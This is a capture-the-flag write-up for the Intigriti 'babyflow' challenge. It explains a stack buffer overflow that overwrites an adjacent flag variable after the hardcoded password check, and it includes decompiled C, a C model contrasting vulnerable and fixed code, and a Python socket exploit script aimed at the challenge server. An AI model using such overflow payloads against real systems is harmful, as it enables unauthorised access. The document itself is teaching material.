
Warmup - Babyflow


Last updated 6 months ago

Challenge

Warmup PWN Challenge: babyflow Writeup

In this writeup, we'll walk through solving the "Warmup" PWN challenge step by step. The goal is to exploit a buffer overflow vulnerability to bypass a password check and reveal the flag.

Analyzing the Binary

We start by loading the binary in Binary Ninja and decompiling it.

The decompiled main looks like this:

int32_t main(int32_t argc, char** argv, char** envp)
{
    int32_t var_c = 0;                         // the "admin" flag, a stack local next to buf
    printf("Enter password: ");
    fgets(&buf, 50, stdin);                    // stores at most 49 bytes plus a NUL; buf's declared size is not shown in this listing

    if (strncmp(&buf, "SuPeRsEcUrEPaSsWoRd123", 22) != 0)
        puts("Incorrect Password!");
    else
        puts("Correct Password!");

    if (var_c == 0)                            // tested regardless of the password result
        puts("Are you sure you are admin? o.O");
    else
        puts("INTIGRITI{the_flag_is_different_…}");

    return 0;
}

Trying to use the password

Key Points:

  • The program asks for a password input and checks it using strncmp against the hardcoded string "SuPeRsEcUrEPaSsWoRd123".

  • After the password comparison, it checks the value of var_c (the listing shows this test runs whether or not the password matched).

    • If var_c is still 0, it prints a message asking if you are the admin.

    • If var_c is non-zero, it reveals the flag.

Step 2: Crafting the Exploit

We need to:

  1. Input the correct password to pass the check.

  2. Overflow the buffer to modify var_c and set it to a non-zero value, which will reveal the flag.

Buffer Overflow:

  • The buffer size is 50 bytes, and the password takes up the first 22 bytes.

  • That leaves 28 bytes for padding and overflow.

  • We need to overflow into var_c (a 4-byte integer) and set it to 1.
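To see the defect from the defender's side, here is an added C model (not the challenge binary and not the author's code) of the frame described above. It assumes a 40-byte buffer, since the real size is not visible in the decompilation, and compares the vulnerable fgets(..., 50, ...) call against the fix that ties the size argument to the buffer.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of babyflow's stack frame. The real buffer size is
 * not visible in the decompilation; 40 bytes is an assumption chosen so
 * that var_c lies inside the 50-byte window that fgets may write. */
#define BUF_LEN 40
struct frame {
    char    buf[BUF_LEN];  /* password buffer */
    int32_t var_c;         /* "admin" flag, initialised to 0 */
    char    slack[16];     /* keeps a 50-byte fgets inside this object */
};

/* Run the challenge's password logic on `input` with `read_len` as the
 * size argument to fgets. Returns -1 if the password check fails,
 * otherwise the value var_c holds afterwards (the flag is printed only
 * when that value is non-zero). */
static int32_t babyflow(const char *input, int read_len)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (!in) return -1;
    /* (char *)&f is the address of f.buf; writing through a pointer to
     * the whole struct keeps this model well-defined even when fgets
     * runs past buf, which is exactly what happens in the binary. */
    fgets((char *)&f, read_len, in);
    fclose(in);
    if (strncmp(f.buf, "SuPeRsEcUrEPaSsWoRd123", 22) != 0) return -1;
    return f.var_c;
}

/* Vulnerable: size argument 50 exceeds the 40-byte buffer, so up to 49 bytes are stored and the tail lands on var_c. */
int32_t babyflow_vulnerable(const char *input) { return babyflow(input, 50); }
/* Fixed: size tied to the buffer; at most 39 bytes are stored and var_c is unreachable from the input. */
int32_t babyflow_fixed(const char *input) { return babyflow(input, BUF_LEN); }

/* Constructed payload: password, padding to the end of buf, then four
 * bytes that land on var_c. Any non-zero bytes work (the writeup sends
 * \x01\x00\x00\x00; 'A's avoid embedded NULs in this C string). */
const char PAYLOAD[] = "SuPeRsEcUrEPaSsWoRd123" "AAAAAAAAAAAAAAAAAA" "AAAA";

int main(void)
{
    printf("vulnerable var_c=0x%x  fixed var_c=%d\n", (unsigned)babyflow_vulnerable(PAYLOAD), babyflow_fixed(PAYLOAD));
    return 0;
}
```

Build on a POSIX system (fmemopen is POSIX, not ISO C); the vulnerable variant returns the 'AAAA' bytes that landed on var_c, while the fixed variant returns 0 for the same input.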

Step 3: Writing the Python Exploit

Now, let's write a Python script to send the payload to the server.

import socket

# Connect to the remote server
host = 'babyflow.ctf.intigriti.io'
port = 1331

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# Receive and print the initial "Enter password: " prompt
response = s.recv(1024).decode('utf-8', errors='replace')
print(response)

# Prepare the exploit payload
password = "SuPeRsEcUrEPaSsWoRd123"
padding = "A" * (50 - len(password))  # Fill the buffer space
overflow_payload = padding + "\x01\x00\x00\x00"  # Overwrite var_c with 1
# Note: fgets(buf, 50, stdin) stores at most 49 input bytes, so these four
# bytes (offsets 50-53) are never read by the binary; the 'A' padding that
# reaches var_c is already non-zero, which is all the var_c check requires.

# Send the payload
s.sendall((password + overflow_payload + "\n").encode('utf-8'))

# Receive and print the flag
response = s.recv(1024).decode('utf-8', errors='replace')
print(response)

# Close the connection
s.close()

Step 4: Running the Exploit

Once the script is ready, simply run it using:

python babyflow.py

If the exploit is successful, the program will print the flag.

Conclusion

This challenge demonstrates a classic buffer overflow attack. We pass the password check by supplying the hardcoded password, then overflow the buffer to manipulate a local variable (var_c). When var_c is changed from 0 to a non-zero value, the program reveals the flag.

By following these steps, we successfully exploited the vulnerability and obtained the flag. This writeup covers the basic principles of exploiting buffer overflows in C programs and how to automate the process using Python.